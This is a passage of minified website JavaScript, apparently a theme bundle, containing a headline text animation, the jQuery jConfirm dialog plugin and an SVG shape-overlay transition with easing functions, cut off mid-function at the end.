i=e.attr("data-color");i&&""!=i&&e.find(".pix-bar").css("background",i),setTimeout(function(){e.find(".pix-words-wrapper").addClass("is-loading")},a)}else if(e.hasClass("clip")){var n=e.find(".pix-words-wrapper"),r=n.width()+10;n.css("width",r)}else if(!e.hasClass("type")){e.find(".pix-words-wrapper span");var l=0;l=e.find(".pix-words-wrapper span").first().width(),e.find(".pix-words-wrapper span").first().height(),e.find(".pix-words-wrapper").width(l)}setTimeout(function(){h(e.find(".is-visible").eq(0))},s)})}function h(e){var i=y(e);if(e.parents(".pix-headline").hasClass("type")){var p=e.parent(".pix-words-wrapper");p.addClass("selected").removeClass("waiting"),setTimeout(function(){p.removeClass("selected"),e.removeClass("is-visible").addClass("is-hidden").children("i").removeClass("in").addClass("out")},l),setTimeout(function(){f(i,r)},d)}else if(e.parents(".pix-headline").hasClass("letters")){var u=e.children("i").length>=i.children("i").length;!function e(i,o,a,s){i.removeClass("in").addClass("out");i.is(":last-child")?a&&setTimeout(function(){h(y(o))},n):setTimeout(function(){e(i.next(),o,a,s)},s);if(i.is(":last-child")&&t("html").hasClass("no-csstransitions")){var r=y(o);g(o,r)}}(e.find("i").eq(0),e,u,s),m(i.find("i").eq(0),i,u,s)}else e.parents(".pix-headline").hasClass("clip")?e.parents(".pix-words-wrapper").animate({width:"2px"},c,function(){g(e,i),f(i)}):e.parents(".pix-headline").hasClass("loading-bar")?(e.parents(".pix-words-wrapper").removeClass("is-loading"),g(e,i),setTimeout(function(){h(i)},o),setTimeout(function(){e.parents(".pix-words-wrapper").addClass("is-loading")},a)):(g(e,i),setTimeout(function(){h(i)},n))}function f(t,e){t.parents(".pix-headline").hasClass("type")?(m(t.find("i").eq(0),t,!1,e),t.addClass("is-visible").removeClass("is-hidden")):t.parents(".pix-headline").hasClass("clip")&&t.parents(".pix-words-wrapper").animate({width:t.width()+10},c,function(){setTimeout(function(){h(t)},p)})}function m(t,e,i,o){t.addClass("in").removeClass("out"),t.is(":last-child")?(e.parents(".pix-headline").hasClass("type")&&setTimeout(function(){e.parents(".pix-words-wrapper").addClass("waiting")},200),i||setTimeout(function(){h(e)},n)):setTimeout(function(){m(t.next(),e,i,o)},o)}function y(t){return t.is(":last-child")||t.next().hasClass("pix-bar")?t.parent().children().eq(0):t.next()}function g(t,e){t.removeClass("is-visible").addClass("is-hidden");var i=e.width();t.parents(".pix-headline").hasClass("rotate-1"),t.parents(".pix-words-wrapper").width(i),e.removeClass("is-hidden").addClass("is-visible")}return{test:1,init:function(){return u(),e(),this},update:function(){u(),e()},play:function(e=!1){!function(e){e||(e=t("body"));e.find(".pix-sliding-headline:not(.pix-ready)").each(function(e,i){var n=t(i).text(),o=n.split(" "),a=t(i).attr("data-style"),s=t(i).attr("data-class"),r="";t.each(o,function(t,e){r+=a&&""!=a?'<span class="slide-in-container"><span class="d-inline-block group-animate-in" style="'+a+'" >'+e+"</span></span> ":'<span class="slide-in-container"><span class="d-inline-block group-animate-in '+s+'" >'+e+"</span></span> "}),t(i).html(r),t(i).addClass("pix-ready");var l=200;t(i).find(".group-animate-in").each(function(e,i){setTimeout(function(){t(i).addClass("animating").addClass("slide-in-up").removeClass("group-animate-in")},l),t(i).one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend",function(){t(i).removeClass("animating").removeClass("slide-in-up").addClass("animated")}),l+=150})})}(e)}}}(jQuery);!function(t){"function"==typeof define&&define.amd?define(["jquery"],t):"object"==typeof module&&module.exports?module.exports=function(e,i){return void 0===i&&(i="undefined"!=typeof window?require("jquery"):require("jquery")(e)),t(i),i}:t(jQuery)}(function(t){var e=window;t.fn.confirm=function(i,n){return void 0===i&&(i={}),"string"==typeof i&&(i={content:i,title:n||!1}),t(this).each(function(){var n=t(this);n.attr("jc-attached")?console.warn("jConfirm has already been attached to this element ",n[0]):(n.on("click",function(o){o.preventDefault();var a=t.extend({},i);if(n.attr("data-title")&&(a.title=n.attr("data-title")),n.attr("data-content")&&(a.content=n.attr("data-content")),void 0===a.buttons&&(a.buttons={}),a.$target=n,n.attr("href")&&0===Object.keys(a.buttons).length){var s=t.extend(!0,{},e.jconfirm.pluginDefaults.defaultButtons,(e.jconfirm.defaults||{}).defaultButtons||{}),r=Object.keys(s)[0];a.buttons=s,a.buttons[r].action=function(){location.href=n.attr("href")}}a.closeIcon=!1;t.confirm(a)}),n.attr("jc-attached",!0))}),t(this)},t.confirm=function(i,n){void 0===i&&(i={}),"string"==typeof i&&(i={content:i,title:n||!1});var o=!(!1===i.buttons);if("object"!=typeof i.buttons&&(i.buttons={}),0===Object.keys(i.buttons).length&&o){var a=t.extend(!0,{},e.jconfirm.pluginDefaults.defaultButtons,(e.jconfirm.defaults||{}).defaultButtons||{});i.buttons=a}return e.jconfirm(i)},t.alert=function(i,n){void 0===i&&(i={}),"string"==typeof i&&(i={content:i,title:n||!1});var o=!(!1===i.buttons);if("object"!=typeof i.buttons&&(i.buttons={}),0===Object.keys(i.buttons).length&&o){var a=t.extend(!0,{},e.jconfirm.pluginDefaults.defaultButtons,(e.jconfirm.defaults||{}).defaultButtons||{}),s=Object.keys(a)[0];i.buttons[s]=a[s]}return e.jconfirm(i)},t.dialog=function(t,i){return void 0===t&&(t={}),"string"==typeof t&&(t={content:t,title:i||!1,closeIcon:function(){}}),t.buttons={},void 0===t.closeIcon&&(t.closeIcon=function(){}),t.confirmKeys=[13],e.jconfirm(t)},e.jconfirm=function(i){void 0===i&&(i={});var n=t.extend(!0,{},e.jconfirm.pluginDefaults);e.jconfirm.defaults&&(n=t.extend(!0,n,e.jconfirm.defaults)),n=t.extend(!0,{},n,i);var o=new e.Jconfirm(n);return e.jconfirm.instances.push(o),o},e.Jconfirm=function(e){t.extend(this,e),this._init()},e.Jconfirm.prototype={_init:function(){var i=this;e.jconfirm.instances.length||(e.jconfirm.lastFocused=t("body").find(":focus")),this._id=Math.round(99999*Math.random()),this.contentParsed=t(document.createElement("div")),this.lazyOpen||setTimeout(function(){i.open()},0)},_buildHTML:function(){var e=this;this._parseAnimation(this.animation,"o"),this._parseAnimation(this.closeAnimation,"c"),this._parseBgDismissAnimation(this.backgroundDismissAnimation),this._parseColumnClass(this.columnClass),this._parseTheme(this.theme),this._parseType(this.type);var i=t(this.template);i.find(".jconfirm-box").addClass(this.animationParsed).addClass(this.backgroundDismissAnimationParsed).addClass(this.typeParsed),this.typeAnimated&&i.find(".jconfirm-box").addClass("jconfirm-type-animated"),this.useBootstrap?(i.find(".jc-bs3-row").addClass(this.bootstrapClasses.row),i.find(".jc-bs3-row").addClass("justify-content-md-center justify-content-sm-center justify-content-xs-center justify-content-lg-center"),i.find(".jconfirm-box-container").addClass(this.columnClassParsed),this.containerFluid?i.find(".jc-bs3-container").addClass(this.bootstrapClasses.containerFluid):i.find(".jc-bs3-container").addClass(this.bootstrapClasses.container)):i.find(".jconfirm-box").css("width",this.boxWidth),this.titleClass&&i.find(".jconfirm-title-c").addClass(this.titleClass),i.addClass(this.themeParsed);var n="jconfirm-box"+this._id;i.find(".jconfirm-box").attr("aria-labelledby",n).attr("tabindex",-1),i.find(".jconfirm-content").attr("id",n),null!==this.bgOpacity&&i.find(".jconfirm-bg").css("opacity",this.bgOpacity),this.rtl&&i.addClass("jconfirm-rtl"),this.$el=i.appendTo(this.container),this.$jconfirmBoxContainer=this.$el.find(".jconfirm-box-container"),this.$jconfirmBox=this.$body=this.$el.find(".jconfirm-box"),this.$jconfirmBg=this.$el.find(".jconfirm-bg"),this.$title=this.$el.find(".jconfirm-title"),this.$titleContainer=this.$el.find(".jconfirm-title-c"),this.$content=this.$el.find("div.jconfirm-content"),this.$contentPane=this.$el.find(".jconfirm-content-pane"),this.$icon=this.$el.find(".jconfirm-icon-c"),this.$closeIcon=this.$el.find(".jconfirm-closeIcon"),this.$holder=this.$el.find(".jconfirm-holder"),this.$btnc=this.$el.find(".jconfirm-buttons"),this.$scrollPane=this.$el.find(".jconfirm-scrollpane"),e.setStartingPoint(),this._contentReady=t.Deferred(),this._modalReady=t.Deferred(),this.$holder.css({"padding-top":this.offsetTop,"padding-bottom":this.offsetBottom}),this.setTitle(),this.setIcon(),this._setButtons(),this._parseContent(),this.initDraggable(),this.isAjax&&this.showLoading(!1),t.when(this._contentReady,this._modalReady).then(function(){e.isAjaxLoading?setTimeout(function(){e.isAjaxLoading=!1,e.setContent(),e.setTitle(),e.setIcon(),setTimeout(function(){e.hideLoading(!1),e._updateContentMaxHeight()},100),"function"==typeof e.onContentReady&&e.onContentReady()},50):(e._updateContentMaxHeight(),e.setTitle(),e.setIcon(),"function"==typeof e.onContentReady&&e.onContentReady()),e.autoClose&&e._startCountDown()}).then(function(){e._watchContent()}),"none"===this.animation&&(this.animationSpeed=1,this.animationBounce=1),this.$body.css(this._getCSS(this.animationSpeed,this.animationBounce)),this.$contentPane.css(this._getCSS(this.animationSpeed,1)),this.$jconfirmBg.css(this._getCSS(this.animationSpeed,1)),this.$jconfirmBoxContainer.css(this._getCSS(this.animationSpeed,1))},_typePrefix:"jconfirm-type-",typeParsed:"",_parseType:function(t){this.typeParsed=this._typePrefix+t},setType:function(t){var e=this.typeParsed;this._parseType(t),this.$jconfirmBox.removeClass(e).addClass(this.typeParsed)},themeParsed:"",_themePrefix:"jconfirm-",setTheme:function(t){var e=this.theme;this.theme=t||this.theme,this._parseTheme(this.theme),e&&this.$el.removeClass(e),this.$el.addClass(this.themeParsed),this.theme=t},_parseTheme:function(e){var i=this;e=e.split(","),t.each(e,function(n,o){-1===o.indexOf(i._themePrefix)&&(e[n]=i._themePrefix+t.trim(o))}),this.themeParsed=e.join(" ").toLowerCase()},backgroundDismissAnimationParsed:"",_bgDismissPrefix:"jconfirm-hilight-",_parseBgDismissAnimation:function(e){var i=e.split(","),n=this;t.each(i,function(e,o){-1===o.indexOf(n._bgDismissPrefix)&&(i[e]=n._bgDismissPrefix+t.trim(o))}),this.backgroundDismissAnimationParsed=i.join(" ").toLowerCase()},animationParsed:"",closeAnimationParsed:"",_animationPrefix:"jconfirm-animation-",setAnimation:function(t){this.animation=t||this.animation,this._parseAnimation(this.animation,"o")},_parseAnimation:function(e,i){i=i||"o";var n=e.split(","),o=this;t.each(n,function(e,i){-1===i.indexOf(o._animationPrefix)&&(n[e]=o._animationPrefix+t.trim(i))});var a=n.join(" ").toLowerCase();return"o"===i?this.animationParsed=a:this.closeAnimationParsed=a,a},setCloseAnimation:function(t){this.closeAnimation=t||this.closeAnimation,this._parseAnimation(this.closeAnimation,"c")},setAnimationSpeed:function(t){this.animationSpeed=t||this.animationSpeed},columnClassParsed:"",setColumnClass:function(t){this.useBootstrap?(this.columnClass=t||this.columnClass,this._parseColumnClass(this.columnClass),this.$jconfirmBoxContainer.addClass(this.columnClassParsed)):console.warn("cannot set columnClass, useBootstrap is set to false")},_updateContentMaxHeight:function(){var e=t(window).height()-(this.$jconfirmBox.outerHeight()-this.$contentPane.outerHeight())-(this.offsetTop+this.offsetBottom);this.$contentPane.css({"max-height":e+"px"})},setBoxWidth:function(t){this.useBootstrap?console.warn("cannot set boxWidth, useBootstrap is set to true"):(this.boxWidth=t,this.$jconfirmBox.css("width",t))},_parseColumnClass:function(t){var e;switch(t=t.toLowerCase()){case"xl":case"xlarge":e="col-md-12";break;case"l":case"large":e="col-md-8 col-md-offset-2";break;case"m":case"medium":e="col-md-6 col-md-offset-3";break;case"s":case"small":e="col-md-4 col-md-offset-4";break;case"xs":case"xsmall":e="col-md-2 col-md-offset-5";break;default:e=t}this.columnClassParsed=e},initDraggable:function(){var e=this,i=this.$titleContainer;this.resetDrag(),this.draggable&&(i.on("mousedown",function(t){i.addClass("jconfirm-hand"),e.mouseX=t.clientX,e.mouseY=t.clientY,e.isDrag=!0}),t(window).on("mousemove."+this._id,function(t){e.isDrag&&(e.movingX=t.clientX-e.mouseX+e.initialX,e.movingY=t.clientY-e.mouseY+e.initialY,e.setDrag())}),t(window).on("mouseup."+this._id,function(){i.removeClass("jconfirm-hand"),e.isDrag&&(e.isDrag=!1,e.initialX=e.movingX,e.initialY=e.movingY)}))},resetDrag:function(){this.isDrag=!1,this.initialX=0,this.initialY=0,this.movingX=0,this.movingY=0,this.mouseX=0,this.mouseY=0,this.$jconfirmBoxContainer.css("transform","translate(0px, 0px)")},setDrag:function(){if(this.draggable){this.alignMiddle=!1;var e=this.$jconfirmBox.outerWidth(),i=this.$jconfirmBox.outerHeight(),n=t(window).width(),o=t(window).height();if(this.movingX%1==0||this.movingY%1==0){if(this.dragWindowBorder){var a=n/2-e/2,s=o/2-i/2;s-=this.dragWindowGap,(a-=this.dragWindowGap)+this.movingX<0?this.movingX=-a:a-this.movingX<0&&(this.movingX=a),s+this.movingY<0?this.movingY=-s:s-this.movingY<0&&(this.movingY=s)}this.$jconfirmBoxContainer.css("transform","translate("+this.movingX+"px, "+this.movingY+"px)")}}},_scrollTop:function(){if("undefined"!=typeof pageYOffset)return pageYOffset;var t=document.body,e=document.documentElement;return(e=e.clientHeight?e:t).scrollTop},_watchContent:function(){var e=this;this._timer&&clearInterval(this._timer);var i=0;this._timer=setInterval(function(){if(e.smoothContent){var n=e.$content.outerHeight()||0;n!==i&&(i=n);var o=t(window).height();e.offsetTop+e.offsetBottom+e.$jconfirmBox.height()-e.$contentPane.height()+e.$content.height()<o?e.$contentPane.addClass("no-scroll"):e.$contentPane.removeClass("no-scroll")}},this.watchInterval)},_overflowClass:"jconfirm-overflow",_hilightAnimating:!1,highlight:function(){this.hiLightModal()},hiLightModal:function(){var t=this;if(!this._hilightAnimating){t.$body.addClass("hilight");var e=parseFloat(t.$body.css("animation-duration"))||2;this._hilightAnimating=!0,setTimeout(function(){t._hilightAnimating=!1,t.$body.removeClass("hilight")},1e3*e)}},_bindEvents:function(){var e=this;this.boxClicked=!1,this.$scrollPane.click(function(t){if(!e.boxClicked){var i,n=!1,o=!1;if("string"==typeof(i="function"==typeof e.backgroundDismiss?e.backgroundDismiss():e.backgroundDismiss)&&void 0!==e.buttons[i]?(n=i,o=!1):o=void 0===i||!0==!!i,n){var a=e.buttons[n].action.apply(e);o=void 0===a||!!a}o?e.close():e.hiLightModal()}e.boxClicked=!1}),this.$jconfirmBox.click(function(t){e.boxClicked=!0});var i=!1;t(window).on("jcKeyDown."+e._id,function(t){i||(i=!0)}),t(window).on("keyup."+e._id,function(t){i&&(e.reactOnKey(t),i=!1)}),t(window).on("resize."+this._id,function(){e._updateContentMaxHeight(),setTimeout(function(){e.resetDrag()},100)})},_cubic_bezier:"0.36, 0.55, 0.19",_getCSS:function(t,e){return{"-webkit-transition-duration":t/1e3+"s","transition-duration":t/1e3+"s","-webkit-transition-timing-function":"cubic-bezier("+this._cubic_bezier+", "+e+")","transition-timing-function":"cubic-bezier("+this._cubic_bezier+", "+e+")"}},_setButtons:function(){var e=this,i=0;if("object"!=typeof this.buttons&&(this.buttons={}),t.each(this.buttons,function(n,o){i+=1,"function"==typeof o&&(e.buttons[n]=o={action:o}),e.buttons[n].text=o.text||n,e.buttons[n].btnClass=o.btnClass||"btn-default",e.buttons[n].action=o.action||function(){},e.buttons[n].keys=o.keys||[],e.buttons[n].isHidden=o.isHidden||!1,e.buttons[n].isDisabled=o.isDisabled||!1,t.each(e.buttons[n].keys,function(t,i){e.buttons[n].keys[t]=i.toLowerCase()});var a=t('<button type="button" class="btn"></button>').html(e.buttons[n].text).addClass(e.buttons[n].btnClass).prop("disabled",e.buttons[n].isDisabled).css("display",e.buttons[n].isHidden?"none":"").click(function(t){t.preventDefault();var i=e.buttons[n].action.apply(e,[e.buttons[n]]);e.onAction.apply(e,[n,e.buttons[n]]),e._stopCountDown(),(void 0===i||i)&&e.close()});e.buttons[n].el=a,e.buttons[n].setText=function(t){a.html(t)},e.buttons[n].addClass=function(t){a.addClass(t)},e.buttons[n].removeClass=function(t){a.removeClass(t)},e.buttons[n].disable=function(){e.buttons[n].isDisabled=!0,a.prop("disabled",!0)},e.buttons[n].enable=function(){e.buttons[n].isDisabled=!1,a.prop("disabled",!1)},e.buttons[n].show=function(){e.buttons[n].isHidden=!1,a.css("display","")},e.buttons[n].hide=function(){e.buttons[n].isHidden=!0,a.css("display","none")},e["$_"+n]=e["$$"+n]=a,e.$btnc.append(a)}),0===i&&this.$btnc.hide(),null===this.closeIcon&&0===i&&(this.closeIcon=!0),this.closeIcon){if(this.closeIconClass){var n='<i class="'+this.closeIconClass+'"></i>';this.$closeIcon.html(n)}this.$closeIcon.click(function(t){t.preventDefault();var i,n=!1,o=!1;if("string"==typeof(i="function"==typeof e.closeIcon?e.closeIcon():e.closeIcon)&&void 0!==e.buttons[i]?(n=i,o=!1):o=void 0===i||!0==!!i,n){var a=e.buttons[n].action.apply(e);o=void 0===a||!!a}o&&e.close()}),this.$closeIcon.show()}else this.$closeIcon.hide()},setTitle:function(t,e){if(e=e||!1,void 0!==t)if("string"==typeof t)this.title=t;else if("function"==typeof t){"function"==typeof t.promise&&console.error("Promise was returned from title function, this is not supported.");var i=t();this.title="string"==typeof i&&i}else this.title=!1;this.isAjaxLoading&&!e||(this.$title.html(this.title||""),this.updateTitleContainer())},setIcon:function(t,e){if(e=e||!1,void 0!==t)if("string"==typeof t)this.icon=t;else if("function"==typeof t){var i=t();this.icon="string"==typeof i&&i}else this.icon=!1;this.isAjaxLoading&&!e||(this.$icon.html(this.icon?'<i class="'+this.icon+'"></i>':""),this.updateTitleContainer())},updateTitleContainer:function(){this.title||this.icon?this.$titleContainer.show():this.$titleContainer.hide()},setContentPrepend:function(t,e){t&&this.contentParsed.prepend(t)},setContentAppend:function(t){t&&this.contentParsed.append(t)},setContent:function(t,e){e=!!e;var i=this;t&&this.contentParsed.html("").append(t),this.isAjaxLoading&&!e||(this.$content.html(""),this.$content.append(this.contentParsed),setTimeout(function(){i.$body.find("input[autofocus]:visible:first").focus()},100))},loadingSpinner:!1,showLoading:function(t){this.loadingSpinner=!0,this.$jconfirmBox.addClass("loading"),t&&this.$btnc.find("button").prop("disabled",!0)},hideLoading:function(t){this.loadingSpinner=!1,this.$jconfirmBox.removeClass("loading"),t&&this.$btnc.find("button").prop("disabled",!1)},ajaxResponse:!1,contentParsed:"",isAjax:!1,isAjaxLoading:!1,_parseContent:function(){var e=this,i=" ";if("function"==typeof this.content){var n=this.content.apply(this);"string"==typeof n?this.content=n:"object"==typeof n&&"function"==typeof n.always?(this.isAjax=!0,this.isAjaxLoading=!0,n.always(function(t,i,n){e.ajaxResponse={data:t,status:i,xhr:n},e._contentReady.resolve(t,i,n),"function"==typeof e.contentLoaded&&e.contentLoaded(t,i,n)}),this.content=i):this.content=i}if("string"==typeof this.content&&"url:"===this.content.substr(0,4).toLowerCase()){this.isAjax=!0,this.isAjaxLoading=!0;var o=this.content.substring(4,this.content.length);t.get(o).done(function(t){e.contentParsed.html(t)}).always(function(t,i,n){e.ajaxResponse={data:t,status:i,xhr:n},e._contentReady.resolve(t,i,n),"function"==typeof e.contentLoaded&&e.contentLoaded(t,i,n)})}this.content||(this.content=i),this.isAjax||(this.contentParsed.html(this.content),this.setContent(),e._contentReady.resolve())},_stopCountDown:function(){clearInterval(this.autoCloseInterval),this.$cd&&this.$cd.remove()},_startCountDown:function(){var e=this,i=this.autoClose.split("|");if(2!==i.length)return console.error("Invalid option for autoClose. example 'close|10000'"),!1;var n=i[0],o=parseInt(i[1]);if(void 0===this.buttons[n])return console.error("Invalid button key '"+n+"' for autoClose"),!1;var a=Math.ceil(o/1e3);this.$cd=t('<span class="countdown"> ('+a+")</span>").appendTo(this["$_"+n]),this.autoCloseInterval=setInterval(function(){e.$cd.html(" ("+(a-=1)+") "),a<=0&&(e["$$"+n].trigger("click"),e._stopCountDown())},1e3)},_getKey:function(t){switch(t){case 192:return"tilde";case 13:return"enter";case 16:return"shift";case 9:return"tab";case 20:return"capslock";case 17:return"ctrl";case 91:return"win";case 18:return"alt";case 27:return"esc";case 32:return"space"}var e=String.fromCharCode(t);return!!/^[A-z0-9]+$/.test(e)&&e.toLowerCase()},reactOnKey:function(e){var i=this,n=t(".jconfirm");if(n.eq(n.length-1)[0]!==this.$el[0])return!1;var o=e.which;if(this.$content.find(":input").is(":focus")&&/13|32/.test(o))return!1;var a,s=this._getKey(o);"esc"===s&&this.escapeKey&&(!0===this.escapeKey?this.$scrollPane.trigger("click"):"string"!=typeof this.escapeKey&&"function"!=typeof this.escapeKey||(a="function"==typeof this.escapeKey?this.escapeKey():this.escapeKey)&&(void 0===this.buttons[a]?console.warn("Invalid escapeKey, no buttons found with key "+a):this["$_"+a].trigger("click")));t.each(this.buttons,function(t,e){-1!==e.keys.indexOf(s)&&i["$_"+t].trigger("click")})},setDialogCenter:function(){console.info("setDialogCenter is deprecated, dialogs are centered with CSS3 tables")},_unwatchContent:function(){clearInterval(this._timer)},close:function(i){var n=this;return"function"==typeof this.onClose&&this.onClose(i),this._unwatchContent(),t(window).unbind("resize."+this._id),t(window).unbind("keyup."+this._id),t(window).unbind("jcKeyDown."+this._id),this.draggable&&(t(window).unbind("mousemove."+this._id),t(window).unbind("mouseup."+this._id),this.$titleContainer.unbind("mousedown")),n.$el.removeClass(n.loadedClass),t("body").removeClass("jconfirm-no-scroll-"+n._id),n.$jconfirmBoxContainer.removeClass("jconfirm-no-transition"),setTimeout(function(){n.$body.addClass(n.closeAnimationParsed),n.$jconfirmBg.addClass("jconfirm-bg-h");var i="none"===n.closeAnimation?1:n.animationSpeed;setTimeout(function(){n.$el.remove();e.jconfirm.instances;for(var i=e.jconfirm.instances.length-1;i>=0;i--)e.jconfirm.instances[i]._id===n._id&&e.jconfirm.instances.splice(i,1);if(!e.jconfirm.instances.length&&n.scrollToPreviousElement&&e.jconfirm.lastFocused&&e.jconfirm.lastFocused.length&&t.contains(document,e.jconfirm.lastFocused[0])){var o=e.jconfirm.lastFocused;if(n.scrollToPreviousElementAnimate){var a=t(window).scrollTop(),s=e.jconfirm.lastFocused.offset().top,r=t(window).height();if(s>a&&s<a+r)o.focus();else{var l=s-Math.round(r/3);t("html, body").animate({scrollTop:l},n.animationSpeed,"swing",function(){o.focus()})}}else o.focus();e.jconfirm.lastFocused=!1}"function"==typeof n.onDestroy&&n.onDestroy()},.4*i)},50),!0},open:function(){return!this.isOpen()&&(this._buildHTML(),this._bindEvents(),this._open(),!0)},setStartingPoint:function(){var i=!1;if(!0!==this.animateFromElement&&this.animateFromElement)i=this.animateFromElement,e.jconfirm.lastClicked=!1;else{if(!e.jconfirm.lastClicked||!0!==this.animateFromElement)return!1;i=e.jconfirm.lastClicked,e.jconfirm.lastClicked=!1}if(!i)return!1;var n=i.offset(),o=i.outerHeight()/2,a=i.outerWidth()/2;o-=this.$jconfirmBox.outerHeight()/2,a-=this.$jconfirmBox.outerWidth()/2;var s=n.top+o;s-=this._scrollTop();var r=n.left+a,l=t(window).height()/2,d=t(window).width()/2;if(s-=l-this.$jconfirmBox.outerHeight()/2,r-=d-this.$jconfirmBox.outerWidth()/2,Math.abs(s)>l||Math.abs(r)>d)return!1;this.$jconfirmBoxContainer.css("transform","translate("+r+"px, "+s+"px)")},_open:function(){var t=this;"function"==typeof t.onOpenBefore&&t.onOpenBefore(),this.$body.removeClass(this.animationParsed),this.$jconfirmBg.removeClass("jconfirm-bg-h"),this.$body.focus(),t.$jconfirmBoxContainer.css("transform","translate(0px, 0px)"),setTimeout(function(){t.$body.css(t._getCSS(t.animationSpeed,1)),t.$body.css({"transition-property":t.$body.css("transition-property")+", margin"}),t.$jconfirmBoxContainer.addClass("jconfirm-no-transition"),t._modalReady.resolve(),"function"==typeof t.onOpen&&t.onOpen(),t.$el.addClass(t.loadedClass)},this.animationSpeed)},loadedClass:"jconfirm-open",isClosed:function(){return!this.$el||0===this.$el.parent().length},isOpen:function(){return!this.isClosed()},toggle:function(){this.isOpen()?this.close():this.open()}},e.jconfirm.instances=[],e.jconfirm.lastFocused=!1,e.jconfirm.pluginDefaults={template:'<div class="jconfirm"><div class="jconfirm-bg jconfirm-bg-h"></div><div class="jconfirm-scrollpane"><div class="jconfirm-row"><div class="jconfirm-cell"><div class="jconfirm-holder"><div class="jc-bs3-container"><div class="jc-bs3-row"><div class="jconfirm-box-container jconfirm-animated"><div class="jconfirm-box" role="dialog" aria-labelledby="labelled" tabindex="-1"><div class="jconfirm-closeIcon">×</div><div class="jconfirm-title-c"><span class="jconfirm-icon-c"></span><span class="jconfirm-title"></span></div><div class="jconfirm-content-pane"><div class="jconfirm-content"></div></div><div class="jconfirm-buttons"></div><div class="jconfirm-clear"></div></div></div></div></div></div></div></div></div></div>',title:"Hello",titleClass:"",type:"default",typeAnimated:!0,draggable:!0,dragWindowGap:15,dragWindowBorder:!0,animateFromElement:!0,alignMiddle:!0,smoothContent:!0,content:"Are you sure to continue?",buttons:{},defaultButtons:{ok:{action:function(){}},close:{action:function(){}}},contentLoaded:function(){},icon:"",lazyOpen:!1,bgOpacity:null,theme:"light",animation:"scale",closeAnimation:"scale",animationSpeed:400,animationBounce:1,escapeKey:!0,rtl:!1,container:"body",containerFluid:!1,backgroundDismiss:!1,backgroundDismissAnimation:"shake",autoClose:!1,closeIcon:null,closeIconClass:!1,watchInterval:100,columnClass:"col-md-4 col-md-offset-4 col-sm-6 col-sm-offset-3 col-xs-10 col-xs-offset-1",boxWidth:"50%",scrollToPreviousElement:!0,scrollToPreviousElementAnimate:!0,useBootstrap:!0,offsetTop:40,offsetBottom:40,bootstrapClasses:{container:"container",containerFluid:"container-fluid",row:"row"},onContentReady:function(){},onOpenBefore:function(){},onOpen:function(){},onClose:function(){},onDestroy:function(){},onAction:function(){}};var i=!1;t(window).on("keydown",function(e){if(!i){var n=!1;t(e.target).closest(".jconfirm-box").length&&(n=!0),n&&t(window).trigger("jcKeyDown"),i=!0}}),t(window).on("keyup",function(){i=!1}),e.jconfirm.lastClicked=!1,t(document).on("mousedown","button, a, [jc-source]",function(){e.jconfirm.lastClicked=t(this)})});const ease={exponentialIn:t=>0==t?t:Math.pow(2,10*(t-1)),exponentialOut:t=>1==t?t:1-Math.pow(2,-10*t),exponentialInOut:t=>0==t||1==t?t:t<.5?.5*Math.pow(2,20*t-10):-.5*Math.pow(2,10-20*t)+1,sineOut:t=>{return Math.sin(1.5707963267948966*t)},circularInOut:t=>t<.5?.5*(1-Math.sqrt(1-4*t*t)):.5*(Math.sqrt((3-2*t)*(2*t-1))+1),cubicIn:t=>t*t*t,cubicOut:t=>{const e=t-1;return e*e*e+1},cubicInOut:t=>t<.5?4*t*t*t:.5*Math.pow(2*t-2,3)+1,quadraticOut:t=>-t*(t-2),quarticOut:t=>Math.pow(t-1,3)*(1-t)+1};class ShapeOverlays{constructor(t){t&&(this.elm=t,this.path=t.querySelectorAll("path"),this.numPoints=10,this.duration=700,this.delayPointsArray=[],this.delayPointsMax=300,this.delayPerPath=250,this.timeStart=Date.now(),this.isOpened=!1,this.isAnimating=!1,this.type="pix-overlay-6","undefined"==pixfort_main_object&&void 0==pixfort_main_object||pixfort_main_object.hasOwnProperty("dataPixOverlay")&&(this.type=pixfort_main_object.dataPixOverlay),"pix-overlay-1"==this.type&&(this.numPoints=18,this.duration=500,this.delayPointsMax=300,this.delayPerPath=100),"pix-overlay-2"==this.type&&(this.numPoints=4,this.duration=600,this.delayPointsMax=180,this.delayPerPath=70),"pix-overlay-3"==this.type&&(this.numPoints=2,this.duration=500,this.delayPointsMax=0,this.delayPerPath=200),"pix-overlay-4"==this.type&&(this.numPoints=4,this.duration=900,this.delayPointsMax=0,this.delayPerPath=60),"pix-overlay-5"==this.type&&(this.numPoints=85,this.duration=400,this.delayPointsMax=300,this.delayPerPath=150))}toggle(){if(this.isAnimating=!0,"pix-overlay-1"==this.type){const e=4*Math.random()+6;for(var t=0;t<this.numPoints;t++){const i=t/(this.numPoints-1)*Math.PI;this.delayPointsArray[t]=(Math.sin(-i)+Math.sin(-i*e)+2)/4*this.delayPointsMax}}if("pix-overlay-2"==this.type){const e=Math.random()*Math.PI*2;for(t=0;t<this.numPoints;t++){const i=t/(this.numPoints-1)*Math.PI*2;this.delayPointsArray[t]=(Math.sin(i+e)+1)/2*this.delayPointsMax}}if("pix-overlay-3"==this.type||"pix-overlay-4"==this.type)for(t=0;t<this.numPoints;t++)this.delayPointsArray[t]=0;if("pix-overlay-5"==this.type||"pix-overlay-6"==this.type)for(t=0;t<this.numPoints;t++)this.delayPointsArray[t]=Math.random()*this.delayPointsMax;!1===this.isOpened?this.open():this.close()}open(){this.isOpened=!0,this.elm.classList.add("is-opened"),this.timeStart=Date.now(),this.renderLoop()}close(){this.isOpened=!1,this.elm.classList.remove("is-opened"),this.timeStart=Date.now(),this.renderLoop()}updatePath(t){const e=[];let i="";if("pix-overlay-1"==this.type||"pix-overlay-2"==this.type){for(var n=0;n<this.numPoints+1;n++)e[n]=100*ease.cubicInOut(Math.min(Math.max(t-this.delayPointsArray[n],0)/this.duration,1));i+=this.isOpened?`M 0 0 V ${e[0]} `:`M 0 ${e[0]} `;for(n=0;n<this.numPoints-1;n++){const t=(n+1)/(this.numPoints-1)*100,o=t-1/(this.numPoints-1)*100/2;i+=`C ${o} ${e[n]} ${o} ${e[n+1]} ${t} ${e[n+1]} `}i+=this.isOpened?"V 0 H 0":"V 100 H 0"}if("pix-overlay-3"==this.type){for(n=0;n<this.numPoints;n++){const i=this.isOpened?1==n?ease.cubicOut:ease.cubicInOut:1==n?ease.cubicInOut:ease.cubicOut;e[n]=100*i(Math.min(Math.max(t-this.delayPointsArray[n],0)/this.duration,1))}i+=this.isOpened?`M 0 0 V ${e[0]} `:`M 0 ${e[0]} `;for(n=0;n<this.numPoints-1;n++){const t=(n+1)/(this.numPoints-1)*100,o=t-1/(this.numPoints-1)*100/2;i+=`C ${o} ${e[n]} 